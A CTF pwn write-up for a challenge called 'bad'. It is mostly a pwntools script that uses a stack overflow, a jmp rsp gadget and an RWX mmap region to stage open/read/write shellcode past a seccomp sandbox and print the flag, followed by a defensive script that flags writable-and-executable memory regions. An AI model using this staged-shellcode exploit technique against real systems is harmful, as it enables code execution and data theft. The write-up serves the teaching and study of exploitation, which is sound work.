Not Bad

exp

There is a seccomp sandbox and only a few syscalls are allowed, so the first idea is to print the flag with orw (open/read/write) shellcode. The stack overflow is length-limited, so the full orw shellcode does not fit, but in this challenge both the stack and the mmap'd region are writable and executable, so we only need a jmp rsp to redirect control flow into a short stager that reads the full orw shellcode and executes it.

from pwn import *

io = process('./bad')          # local; the original script started './idaidg/linux_server64' here
#io = remote('node3.buuoj.cn',25254)
context.binary = ELF('./bad')

jump_rsp = 0x400a01            # address of a `jmp rsp` gadget in the binary
mmap = 0x123000                # RWX region mapped by the binary

# Stage 1: read(0, mmap, 0x100) into the RWX mapping, then jump there.
payload = asm(shellcraft.read(0, mmap, 0x100)) + asm(f"mov rax,{mmap};call rax")
payload = payload.ljust(0x28, b'a')   # pad to the saved return address (bytes, not str, on py3)
payload += p64(jump_rsp)              # ret -> jmp rsp, rsp now points just past the return address
payload += asm('sub rsp,0x30;jmp rsp')  # 0x28 + 8 = 0x30: rewind rsp to the start of the buffer and run stage 1

io.recvuntil(b'Easy shellcode, have fun!')
io.sendline(payload)

# Stage 2: full orw shellcode, delivered through the read() of stage 1.
payload = ''
payload += shellcraft.open('./flag')
payload += shellcraft.read(3, mmap + 0x200, 0x100)
payload += shellcraft.write(1, mmap + 0x200, 0x100)

sleep(0.2)                     # give stage 1 time to reach its read() before sending
io.sendline(asm(payload))

io.interactive()
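The whole technique above rests on one misconfiguration: the stack and an mmap'd region are mapped writable and executable at the same time. As an added example (not part of the original write-up), the following script parses /proc/<pid>/maps and flags every W+X region, which is the check a defender would run against a binary like this one; the sample maps text and the paths in it are constructed.

```python
"""Flag memory regions that are both writable and executable.

Added example, not from the original write-up.  Works on real
/proc/<pid>/maps output; SAMPLE_MAPS below is constructed to mirror the
layout the challenge relies on (RWX mapping at 0x123000 and an RWX stack).
"""
import re
import sys

MAPS_LINE = re.compile(
    r'^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxps-]{4})\s+'
    r'\S+\s+\S+\s+\d+\s*(?P<path>.*)$')


def parse_maps(maps_text):
    """Yield (start, end, perms, path) for each line of /proc/<pid>/maps."""
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if m:
            yield int(m['start'], 16), int(m['end'], 16), m['perms'], m['path']


def find_wx_regions(maps_text):
    """Return [(start, end, path)] for regions that are writable AND executable."""
    return [(s, e, path) for s, e, perms, path in parse_maps(maps_text)
            if 'w' in perms and 'x' in perms]


# Constructed sample: anonymous RWX mapping at 0x123000, normal r-x text and
# rw- data segments, a read-only loader page, and an RWX stack.
SAMPLE_MAPS = """\
00123000-00124000 rwxp 00000000 00:00 0
00400000-00401000 r-xp 00000000 08:01 1234 /home/ctf/bad
00600000-00601000 rw-p 00000000 08:01 1234 /home/ctf/bad
7ffff7dd0000-7ffff7dd2000 r--p 00000000 08:01 5678 /lib/x86_64-linux-gnu/ld-2.27.so
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack]
"""

if __name__ == '__main__':
    # Usage: python3 wxcheck.py [pid]; without a pid the constructed sample is used.
    text = open(f'/proc/{sys.argv[1]}/maps').read() if len(sys.argv) > 1 else SAMPLE_MAPS
    for start, end, path in find_wx_regions(text):
        print(f'W+X: {start:#x}-{end:#x} {path or "[anon]"}')
```

A clean binary (NX enabled, no RWX mmap) produces no output; the two hits on the sample are exactly the regions the exploit script writes its stager and its orw shellcode into.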

Source

https://blog.csdn.net/github_36788573/article/details/104780509

posted @ 2020-08-03 12:06  PwnKi  reads (334)  comments (0)